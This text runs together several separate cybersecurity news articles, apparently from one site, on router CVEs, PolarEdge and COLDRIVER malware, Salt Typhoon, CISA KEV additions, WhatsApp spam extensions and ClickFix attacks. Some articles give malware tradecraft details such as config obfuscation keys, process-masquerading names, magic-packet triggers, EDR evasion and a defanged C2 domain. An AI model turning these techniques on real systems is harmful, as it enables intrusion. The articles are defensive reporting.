TP-Link has released security updates to address four security flaws impacting Omada gateway devices, including two critical bugs that could result in arbitrary code execution.
CVE-2025-6541 (CVSS score: 8.6) – An operating system command injection vulnerability that could be exploited by an attacker who can log in to the web management interface to run arbitrary commands
CVE-2025-6542 (CVSS score: 9.3) – An operating system command injection vulnerability that could be exploited by a remote unauthenticated attacker to run arbitrary commands
CVE-2025-7850 (CVSS score: 9.3) – An operating system command injection vulnerability that could be exploited by an attacker in possession of an administrator password of the web portal to run arbitrary commands
CVE-2025-7851 (CVSS score: 8.7) – An improper privilege management vulnerability that could be exploited by an attacker to obtain the root shell on the underlying operating system under restricted conditions
“Attackers may execute arbitrary commands on the device’s underlying operating system,” TP-Link said in an advisory released Tuesday.
The issues impact the following product models and versions –
ER8411 < 1.3.3 Build 20251013 Rel.44647
ER7412-M2 < 1.1.0 Build 20251015 Rel.63594
ER707-M2 < 1.3.1 Build 20251009 Rel.67687
ER7206 < 2.2.2 Build 20250724 Rel.11109
ER605 < 2.3.1 Build 20251015 Rel.78291
ER706W < 1.2.1 Build 20250821 Rel.80909
ER706W-4G < 1.2.1 Build 20250821 Rel.82492
ER7212PC < 2.1.3 Build 20251016 Rel.82571
G36 < 1.1.4 Build 20251015 Rel.84206
G611 < 1.2.2 Build 20251017 Rel.45512
FR365 < 1.1.10 Build 20250626 Rel.81746
FR205 < 1.0.3 Build 20251016 Rel.61376
FR307-M2 < 1.2.5 Build 20251015 Rel.76743
While TP-Link makes no mention of the flaws being exploited in the wild, it’s advised that users move quickly to download and update to the latest firmware to fix the vulnerabilities.
“Check the configurations of the device after the firmware upgrade to ensure that all settings remain accurate, secure, and aligned with their intended preferences,” it added.
It also noted in a disclaimer that it cannot bear any responsibility for any consequences that may arise if the aforementioned recommended actions are not adhered to.
Cybersecurity researchers have shed light on the inner workings of a botnet malware called PolarEdge.
PolarEdge was first documented by Sekoia in February 2025, attributing it to a campaign targeting routers from Cisco, ASUS, QNAP, and Synology with the goal of corralling them into a network for an as-yet-undetermined purpose.
The TLS-based ELF implant, at its core, is designed to monitor incoming client connections and execute commands within them.
Then, in August 2025, attack surface management platform Censys detailed the infrastructural backbone powering the botnet, with the company noting that PolarEdge exhibits characteristics that are consistent with an Operational Relay Box (ORB) network. There is evidence to suggest that the activity involving the malware may have started as far back as June 2023.
In the attack chains observed in February 2025, the threat actors have been observed exploiting a known security flaw impacting Cisco routers (CVE-2023-20118) to download a shell script named “q” over FTP, which is then responsible for retrieving and executing the PolarEdge backdoor on the compromised system.
“The backdoor’s primary function is to send a host fingerprint to its command-and-control server and then listen for commands over a built-in TLS server implemented with mbedTLS,” the French cybersecurity company said in a technical breakdown of the malware.
PolarEdge is designed to support two modes of operation: a connect-back mode, where the backdoor acts as a TLS client to download a file from a remote server, and debug mode, where the backdoor enters into an interactive mode to modify its configuration (i.e., server information) on-the-fly.
The configuration is embedded in the final 512 bytes of the ELF image, obfuscated by a one-byte XOR that can be decrypted with single-byte key 0x11.
However, its default mode is to function as a TLS server in order to send a host fingerprint to the command-and-control (C2) server and wait for commands to be sent. The TLS server is implemented with mbedTLS v2.8.0 and relies on a custom binary protocol for parsing incoming requests matching specific criteria, including a parameter named “HasCommand.”
If the “HasCommand” parameter equals the ASCII character 1, the backdoor proceeds to extract and run the command specified in the “Command” field and transmits back the raw output of the executed command.
Once launched, PolarEdge also moves (e.g., /usr/bin/wget, /sbin/curl) and deletes certain files (“/share/CACHEDEV1_DATA/.qpkg/CMS-WS/cgi-bin/library.cgi.bak”) on the infected device, although the exact purpose behind this step is unclear.
Furthermore, the backdoor incorporates a wide range of anti-analysis techniques to obfuscate information related to the TLS server setup and fingerprinting logic. To evade detection, it employs process masquerading during its initialization phase by choosing from a predefined list a name at random. Some of the names included are: igmpproxy, wscd, /sbin/dhcpd, httpd, upnpd, and iapp.
“Although the backdoor does not ensure persistence across reboots, it calls fork to spawn a child process that, every 30 seconds, checks whether /proc/<parent-pid> still exists,” Sekoia researchers explained. “If the directory has disappeared, the child executes a shell command to relaunch the backdoor.”
The disclosure comes as Synthient highlighted GhostSocks’ ability to convert compromised devices into SOCKS5 residential proxies. GhostSocks is said to have been first advertised under the malware-as-a-service (MaaS) model on the XSS forum in October 2023.
It’s worth noting that the offering has been integrated into Lumma Stealer as of early 2024, allowing customers of the stealer malware to monetize the compromised devices post-infection.
“GhostSocks provides clients with the ability to build a 32-bit DLL or executable,” Synthient said in a recent analysis. “GhostSocks will attempt to locate a configuration file in %TEMP%. In the scenario that the configuration file cannot be found, it will fall back to a hard-coded config.”
The configuration contains details of the C2 server to which a connection is established for provisioning the SOCKS5 proxy and ultimately spawning a connection using the open-source go-socks5 and yamux libraries.
Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams.
To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes.
On Messenger, users can opt to enable a setting called “Scam detection” by navigating to Privacy & safety settings. Once it’s turned on, users are alerted when they receive a potentially suspicious message from an unknown connection that may contain signs of a scam.
“Because detection happens on your device, chats with end-to-end encryption stay secure,” Meta said in a support document. “If you’re notified that a chat may contain signs of a scam, we’ll ask if you’d like to send recent messages you received to AI review. Messages that are shared with AI are no longer end-to-end encrypted.”
If the review finds that it’s indeed a possible scam, users are given more information about common scams, such as job offers in exchange for money, opportunities promising fast cash, and work-from-home offers for jobs that can’t possibly be done remotely. Users are also provided options to block or report the account in question.
As part of its ongoing efforts to combat scams, the social media giant said it took action on over 21,000 Facebook Pages and accounts masquerading as customer support in an attempt to trick people into sharing their personal information.
In addition, Meta said it detected and disrupted close to 8 million accounts on Facebook and Instagram since the start of the year that are associated with criminal scam centers targeting people, including the elderly, across the world through messaging, dating apps, social media, crypto, and other apps. The scam compounds operated out of Myanmar, Laos, Cambodia, the United Arab Emirates, and the Philippines.
These schemes, often called romance baiting (aka pig butchering), are run by cybercrime syndicates based out of Southeast Asia and refer to a type of investment fraud where criminals entice victims into depositing ever-larger sums into bogus platforms with promises of bigger returns.
In many of the cases, the scammers – who are themselves trafficked into the region with lures of high-paying jobs and held against their will – initiate contact with victims through dating apps, social media platforms, or private messaging services like WhatsApp.
Once they establish rapport, the operation moves to the next phase, with the threat actors steering victims toward supposed investment opportunities, often tied to cryptocurrencies, and deceiving them into depositing their funds and ultimately disappearing without a trace.
“Central to the scam is psychological manipulation: perpetrators cultivate emotional bonds, instill confidence, and in some cases even simulate romantic relationships,” Infoblox noted in an analysis published earlier this month. “This drawn-out grooming process lowers victims’ defenses and primes them to believe in promises of extraordinary returns, leading to devastating financial losses.”
Artificial intelligence (AI) holds tremendous promise for improving cyber defense and making the lives of security practitioners easier. It can help teams cut through alert fatigue, spot patterns faster, and bring a level of scale that human analysts alone can’t match. But realizing that potential depends on securing the systems that make it possible.
Every organization experimenting with AI in security operations is, knowingly or not, expanding its attack surface. Without clear governance, strong identity controls, and visibility into how AI makes its decisions, even well-intentioned deployments can create risk faster than they reduce it. To truly benefit from AI, defenders need to approach securing it with the same rigor they apply to any other critical system. That means establishing trust in the data it learns from, accountability for the actions it takes, and oversight for the outcomes it produces. When secured correctly, AI can amplify human capability instead of replacing it to help practitioners work smarter, respond faster, and defend more effectively.
Establishing Trust for Agentic AI Systems
As organizations begin to integrate AI into defensive workflows, identity security becomes the foundation for trust. Every model, script, or autonomous agent operating in a production environment now represents a new identity — one capable of accessing data, issuing commands, and influencing defensive outcomes. If those identities aren’t properly governed, the tools meant to strengthen security can quietly become sources of risk.
The emergence of Agentic AI systems make this especially important. These systems don’t just analyze; they may act without human intervention. They triage alerts, enrich context, or trigger response playbooks under delegated authority from human operators. Each action is, in effect, a transaction of trust. That trust must be bound to identity, authenticated through policy, and auditable end to end.
The same principles that secure people and services must now apply to AI agents:
Scoped credentials and least privilege to ensure every model or agent can access only the data and functions required for its task.
Strong authentication and key rotation to prevent impersonation or credential leakage.
Activity provenance and audit logging so every AI-initiated action can be traced, validated, and reversed if necessary.
Segmentation and isolation to prevent cross-agent access, ensuring that one compromised process cannot influence others.
In practice, this means treating every agentic AI system as a first-class identity within your IAM framework. Each should have a defined owner, lifecycle policy, and monitoring scope just like any user or service account. Defensive teams should continuously verify what those agents can do, not just what they were intended to do, because capability often drifts faster than design. With identity established as the foundation, defenders can then turn their attention to securing the broader system.
Securing AI: Best Practices for Success
Securing AI begins with protecting the systems that make it possible — the models, data pipelines, and integrations now woven into everyday security operations. Just as
we secure networks and endpoints, AI systems must be treated as mission-critical infrastructure that requires layered and continuous defense.
Access Controls: Apply least privilege and strong authentication to every model, dataset, and API. Log and review access continuously to prevent unauthorized use.
Data Controls: Validate, sanitize, and classify all data used for training, augmentation, or inference. Secure storage and lineage tracking reduce the risk of model poisoning or data leakage.
Deployment Strategies: Harden AI pipelines and environments with sandboxing, CI/CD gating, and red-teaming before release. Treat deployment as a controlled, auditable event, not an experiment.
Inference Security: Protect models from prompt injection and misuse by enforcing input/output validation, guardrails, and escalation paths for high-impact actions.
Monitoring: Continuously observe model behavior and output for drift, anomalies, and signs of compromise. Effective telemetry allows defenders to detect manipulation before it spreads.
Model Security: Version, sign, and integrity-check models throughout their lifecycle to ensure authenticity and prevent unauthorized swaps or retraining.
These controls align directly NIST’s AI Risk Management Framework and the OWASP Top 10 for LLMs, which highlights the most common and consequential vulnerabilities in AI systems — from prompt injection and insecure plugin integrations to model poisoning and data exposure. Applying mitigations from those frameworks inside these six domains helps translate guidance into operational defense. Once these foundations are in place, teams can focus on using AI responsibly by knowing when to trust automation and when to keep humans in the loop.
Balancing Augmentation and Automation
AI systems are capable of assisting human practitioners like an intern that never sleeps. However, it is critical for security teams to differentiate what to automate from what to augment. Some tasks benefit from full automation, especially those that are repeatable, measurable, and low-risk if an error occurs. However, others demand direct human oversight because context, intuition, or ethics matter more than speed.
Threat enrichment, log parsing, and alert deduplication are prime candidates for automation. These are data-heavy, pattern-driven processes where consistency outperforms creativity. By contrast, incident scoping, attribution, and response decisions rely on context that AI cannot fully grasp. Here, AI should assist by surfacing indicators, suggesting next steps, or summarizing findings while practitioners retain decision authority.
Finding that balance requires maturity in process design. Security teams should categorize workflows by their tolerance for error and the cost of automation failure. Wherever the risk of false positives or missed nuance is high, keep humans in the loop. Wherever precision can be objectively measured, let AI accelerate the work.
Join us at SANS Surge 2026!
I’ll dive deeper into this topic during my keynote at SANS Surge 2026 (Feb. 23-28, 2026), where we’ll explore how security teams can ensure AI systems are safe to depend on. If your organization is moving fast on AI adoption, this event will help you move more securely. Join us to connect with peers, learn from experts, and see what secure AI in practice really looks like.
Note: This article was contributed by Frank Kim, SANS Institute Fellow.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
A European telecommunications organization is said to have been targeted by a threat actor that aligns with a China-nexus cyber espionage group known as Salt Typhoon.
The organization, per Darktrace, was targeted in the first week of July 2025, with the attackers exploiting a Citrix NetScaler Gateway appliance to obtain initial access.
Salt Typhoon, also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC5807, is the name given to an advanced persistent threat actor with ties to China. Known to be active since 2019, the group gained prominence last year following its attacks on telecommunications services providers, energy networks, and government systems in the U.S.
The adversary has a track record of exploiting security flaws in edge devices, maintaining deep persistence, and exfiltrating sensitive data from victims in more than 80 countries across North America, Europe, the Middle East, and Africa.
In the incident observed against the European telecommunications entity, the attackers are said to have leveraged the foothold to pivot to Citrix Virtual Delivery Agent (VDA) hosts in the client’s Machine Creation Services (MCS) subnet, while also using SoftEther VPN to obscure their true origins.
One of the malware families delivered as part of the attack is Snappybee (aka Deed RAT), a suspected successor to the ShadowPad (aka PoisonPlug) malware that has been deployed in prior Salt Typhoon attacks. The malware is launched by means of a technique called DLL side-loading, which has been adopted by a number of Chinese hacking groups over the years.
“The backdoor was delivered to these internal endpoints as a DLL alongside legitimate executable files for antivirus software such as Norton Antivirus, Bkav Antivirus, and IObit Malware Fighter,” Darktrace said. “This pattern of activity indicates that the attacker relied on DLL side-loading via legitimate antivirus software to execute their payloads.”
The malware is designed to contact an external server (“aar.gandhibludtric[.]com”) over HTTP and an unidentified TCP-based protocol. Darktrace said the intrusion activity was identified and remediated before it could escalate further.
“Salt Typhoon continues to challenge defenders with its stealth, persistence, and abuse of legitimate tools,” the company added. “The evolving nature of Salt Typhoon’s tradecraft, and its ability to repurpose trusted software and infrastructure, ensures it will remain difficult to detect using conventional methods alone.”
A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased “operations tempo” from the threat actor.
The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time.
While it’s currently not known for how long the new malware families have been under development, the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure.
The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected via a delivery chain,” GTIG researcher Wesley Shields said in a Monday analysis.
The latest attack waves are something of a departure from COLDRIVER’s typical modus operandi, which involves targeting high profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt.
While the attacks spotted in January, March, and April 2025 led to the deployment of an information stealing malware known as LOSTKEYS, subsequent intrusions have paved the way for the “ROBOT” family of malware. It’s worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.
The new infection chain commences with an HTML ClickFix lure dubbed COLDCOPY that’s designed to drop a DLL called NOROBOT, which is then executed via rundll32.exe to drop the next-stage malware. Initial versions of this attack is said to have distributed a Python backdoor known as YESROBOT, before the threat actors switch to a Powershell implant named MAYBEROBOT.
YESROBOT uses HTTPS to retrieve commands from a hard-coded command-and-control (C2) server. A minimal backdoor, it supports the ability to download and execute files, and retrieve documents of interest. Only two instances of YESROBOT deployment have been observed to date, specifically over a two week period in late May shortly after details of LOSTKEYS became public knowledge.
In contrast, MAYBEROBOT is assessed to be more flexible and extensible, equipped with features to download and run payload from a specified URL, run commands using cmd.exe, and run PowerShell code.
It’s believed that the COLDRIVER actors rushed to deploy YESROBOT as a “stopgap mechanism” likely in response to public disclosure, before abandoning it in favor of MAYBEROBOT, as the earliest version of NOROBOT also included a step to download a full Python 3.8 installation onto the compromised host — a “noisy” artifact that’s bound to raise suspicion.
Google also pointed out that the use of NOROBOT and MAYBEROBOT is likely reserved for significant targets, who may have been already compromised via phishing, with the end goal of gathering additional intelligence from their devices.
“NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” Shields said. “This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”
The disclosure comes as the Netherlands’ Public Prosecution Service, known as the Openbaar Ministerie (OM), announced that three 17-year-old men have been suspected of providing services to a foreign government, with one of them alleged to be in contact with a hacker group affiliated with the Russian government.
“This suspect also gave the other two instructions to map Wi-Fi networks on multiple dates in The Hague,” OM said. “The information collected has been shared with the client by the former suspect for a fee and can be used for digital espionage and cyber attacks.”
Two of the suspects were apprehended on September 22, 2025, while the third suspect, who was also interviewed by authorities, has been kept under house arrest because of his “limited role” in the case.
“There are no indications yet that pressure has been exerted on the suspect who was in contact with the hacker group affiliated with the Russian government,” the Dutch government body added.
Oct 20, 2025Ravie LakshmananThreat Intelligence / Data Security
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws to its Known Exploited Vulnerabilities (KEV) Catalog, officially confirming a recently disclosed vulnerability impacting Oracle E-Business Suite (EBS) has been weaponized in real-world attacks.
The security defect in question is CVE-2025-61884 (CVSS score: 7.5), which has been described as a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator that could allow attackers unauthorized access to critical data.
“This vulnerability is remotely exploitable without authentication,” CISA said.
CVE-2025-61884 is the second flaw in Oracle EBS to be actively exploited along with CVE-2025-61882 (CVSS score: 9.8), a critical bug that could permit unauthenticated attackers to execute arbitrary code on susceptible instances.
Earlier this month, Google Threat Intelligence Group (GTIG) and Mandiant revealed dozens of organizations may have been impacted following the exploitation of CVE-2025-61882.
“At this time, we are not able to attribute any specific exploitation activity to a specific actor, but it’s likely that at least some of the exploitation activity we observed was conducted by actors now conducting Cl0p-branded extortion operations,” Zander Work, senior security engineer at GTIG, told The Hacker News last week.
Also added by CISA to the KEV catalog are four other vulnerabilities –
CVE-2025-33073 (CVSS score: 8.8) – An improper access control vulnerability in Microsoft Windows SMB Client that could allow for privilege escalation (Fixed by Microsoft in June 2025)
CVE-2025-2746 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling of empty SHA1 usernames in digest authentication (Fixed in Kentico in March 2025)
CVE-2025-2747 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling for the server defined None type (Fixed in Kentico in March 2025)
CVE-2022-48503 (CVSS score: 8.8) – An improper validation of array index vulnerability in Apple’s JavaScriptCore component that could result in arbitrary code execution when processing web content (Fixed by Apple in July 2022)
There are currently no details on how the aforementioned four issues are being exploited in the wild, although details about CVE-2025-33073, CVE-2025-2746, and CVE-2025-2747 were shared by researchers from Synacktiv and watchTowr Labs, respectively.
Federal Civilian Executive Branch (FCEB) agencies are required to remediate identified vulnerabilities by November 10, 2025, to secure their networks against active threats.
Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.
The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.
“They are not classic malware, but they function as high-risk spam automation that abuses platform rules,” security researcher Kirill Boychenko said. “The code injects directly into the WhatsApp Web page, running alongside WhatsApp’s own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp’s anti-spam enforcement.”
The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform’s rate limits and anti-spam controls.
The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below –
YouSeller (10,000 users)
performancemais (239 users)
Botflow (38 users)
ZapVende (32 users)
The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by “WL Extensão” and its variant “WLExtensao.” It’s believed that the differences in branding are the result of a franchise model that allows the operation’s affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.
These add-ons also claim to masquerade as customer relationship management (CRM) tools for WhatsApp, allowing users to maximize their sales through the web version of the application.
“Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you’ll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more,” reads the description of ZapVende on the Chrome Web Store. “Organize your customer service, track leads, and schedule messages in a practical and efficient way.”
DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.
It’s worth noting that the practice is in violation of Google’s Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp’s anti-spam algorithms when using the extensions.
“The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation,” Boychenko noted. “The goal is to keep bulk campaigns running while evading anti-spam systems.”
The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that’s targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that’s used to distribute a banking trojan codenamed Maverick.
ClickFix, FileFix, fake CAPTCHA — whatever you call it, attacks where users interact with malicious scripts in their web browser are a fast-growing source of security breaches.
ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage.
The name is a little misleading, though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally.
Examples of ClickFix lures used by attackers in the wild.
ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors, including state-sponsored APTs. A number of recent public data breaches have been linked to ClickFix-style TTPs, such as Kettering Health, DaVita, City of St. Paul, Minnesota, and the Texas Tech University Health Sciences Centers (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).
But why are these attacks proving to be so effective?
Reason 1: Users aren’t ready for ClickFix
For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command.
Suspicion is further reduced when you consider that the malicious clipboard copy action is performed behind the scenes via JavaScript 99% of the time.
Example of unobfuscated JavaScript code performing the copy function automatically on a ClickFix page without user input.
And with modern ClickFix sites and lures becoming increasingly legitimate-looking (see the example below), it’s not surprising that users are falling victim.
One of the more legit-looking ClickFix lures — this one even has an embedded video showing the user what to do!
When you consider the fact that these attacks are moving away from email altogether, it doesn’t fit the model of what users are trained to be suspicious of.
The top delivery vector identified by Push Security researchers was found to be SEO poisoning & malvertising via Google Search. By creating new domains or taking over legitimate ones, attackers are creating watering hole scenarios to intercept users browsing the internet.
And even if you were suspicious, there’s no convenient “report phishing” button or workflow to notify your security team for Google Search results, social media messages, website ads, and so on.
Reason 2: ClickFix isn’t being detected during delivery
There are a few aspects of why ClickFix attacks are going undetected by technical controls.
ClickFix pages, like other modern phishing sites, are using a range of detection evasion techniques that prevent them from being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e., blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures from firing.
Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.
Malvertising adds another layer of targeting to the picture. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target is located, you can tailor the ad parameters accordingly.
Along with other techniques, like conditional loading to return a lure appropriate for your operating system (or not triggering at all unless certain conditions are met, e.g. you’re visiting from a mobile OS, or from outside a target IP range) attackers have a way of reaching a large number of potential victims while avoiding security controls at the email layer and preventing unwanted analysis.
Example of a ClickFix lure built onto a vibe-coded site.
Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.
Reason 3: EDR is the last and only line of defense — and it’s not foolproof
There are multiple stages to the attack that can and should be intercepted by EDR, but the level of detection raised, and whether an action is blocked in real time, is driven by context.
Because there’s no file download from the web, and the act of running code on the machine is initiated by the user, there’s no context tying the action to another application to make it appear suspicious. For example, malicious PowerShell executed from Outlook or Chrome would appear obviously suspicious, but because it’s user-initiated, it’s isolated from the context of where the code was delivered.
The malicious commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately.
The final stage at which the attack should be intercepted by any reputable EDR is at the point of malware execution. But detection evasion is a cat-and-mouse game, and attackers are always looking for ways to tweak their malware to evade or disable detection tools. So, exceptions do happen.
And if you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.
Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all.
Why the standard recommendations are falling short
Most of the vendor-agnostic recommendations have focused on restricting access to services like the Windows Run dialog box for typical users. But although mshta and PowerShell remain the most commonly observed, security researchers have already spotted a wide range of LOLBINS targeting different services, many of which are difficult to prevent users from accessing.
It’s also worth considering how ClickFix-style attacks may continue to evolve in the future. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? For example, by pasting malicious JavaScript directly into the devtools on a relevant webpage.
The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether?
Stopping ClickFix on the front line — in the browser
Push Security’s latest feature, malicious copy and paste detection, tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.
Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.
Check out the video below for more information.
Learn more
If you want to learn more about ClickFix attacks and how they’re evolving, check out this upcoming webinar where Push Security researchers will be diving into real-world ClickFix examples and demonstrating how ClickFix sites work under the hood.
Push Security’s browser-based security platform provides comprehensive attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more, to harden your identity attack surface.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
It’s easy to think your defenses are solid — until you realize attackers have been inside them the whole time. The latest incidents show that long-term, silent breaches are becoming the norm. The best defense now isn’t just patching fast, but watching smarter and staying alert for what you don’t expect.
Here’s a quick look at this week’s top threats, new tactics, and security stories shaping the landscape.
⚡ Threat of the Week
F5 Exposed to Nation-State Breach— F5 disclosed that unidentified threat actors broke into its systems and stole files containing some of BIG-IP’s source code and information related to undisclosed vulnerabilities in the product. The company said it learned of the incident on August 9, 2025, although it’s believed that the attackers were in its network for at least 12 months. The attackers are said to have used a malware family called BRICKSTORM, which is attributed to a China-nexus espionage group dubbed UNC5221. GreyNoise said it observed elevated scanning activity targeting BIG-IP in three waves on September 23, October 14, and October 15, 2025, but emphasized the anomalies may not necessarily relate to the hack. Censys said it identified over 680,000 F5 BIG-IP load balancers and application gateways visible on the public internet, with the majority of hosts located in the U.S., followed by Germany, France, Japan, and China. Not all identified systems are necessarily vulnerable, but each represents a publicly accessible interface that should be inventoried, access-restricted, and patched proactively as a precautionary measure. “Edge infrastructure and security vendors remain prime targets for long-term, often state-linked threat actors,” John Fokker, vice president of threat intelligence strategy at Trellix, said. “Over the years, we have seen nation-state interest in exploiting vulnerabilities in edge devices, recognizing their strategic position in global networks. Incidents like these remind us that strengthening collective resilience requires not only hardened technology but also open collaboration and intelligence sharing across the security community.”
🔔 Top News
N. Korea Uses EtherHiding to Hide Malware Inside Blockchain Smart Contracts— North Korean threat actors have been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed to a cluster tracked as UNC5342 (aka Famous Chollima). The attack wave is part of a long-running campaign codenamed Contagious Interview, wherein the attackers approach potential targets on LinkedIn by posing as recruiters or hiring managers, and trick them into running malicious code under the pretext of a job assessment after shifting the conversation to Telegram or Discord. In the latest attack waves observed since February 2025, the threat actors use a JavaScript downloader that interacts with a malicious BSC smart contract to download JADESNOW, which subsequently queries the transaction history associated with an Ethereum address to fetch the JavaScript version of InvisibleFerret.
LinkPro Linux Rootkit Spotted in the Wild— An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure led to the discovery of a new GNU/Linux rootkit dubbed LinkPro. The backdoor features functionalities relying on the installation of two extended Berkeley Packet Filter (eBPF) modules to conceal itself and to be remotely activated upon receiving a magic packet – a TCP SYN packet with a specific window size (54321) that signals the rootkit to await further instructions within a one-hour window, allowing it to evade traditional security defenses. The commands supported by LinkPro include executing /bin/bash in a pseudo-terminal, running a shell command, enumerating files and directories, performing file operations, downloading files, and setting up a SOCKS5 proxy tunnel. It’s currently not known who is behind the attack, but it’s suspected that the threat actors are financially motivated.
Zero Disco Campaign Targets Cisco Devices with Rootkits— A new campaign has exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, Trend Micro said. The intrusions have not been attributed to any known threat actor or group.
Pixnapping Attack Leads to Data Theft on Android Devices— Android devices from Google and Samsung have been found vulnerable to a side-channel attack that could be exploited to covertly steal two-factor authentication (2FA) codes, Google Maps timelines, and other sensitive data without the users’ knowledge pixel-by-pixel. The attack has been codenamed Pixnapping. Google is tracking the issue under the CVE identifier CVE-2025-48561 (CVSS score: 5.5). Patches for the vulnerability were issued by the tech giant as part of its September 2025 Android Security Bulletin, with additional fixes forthcoming in December.
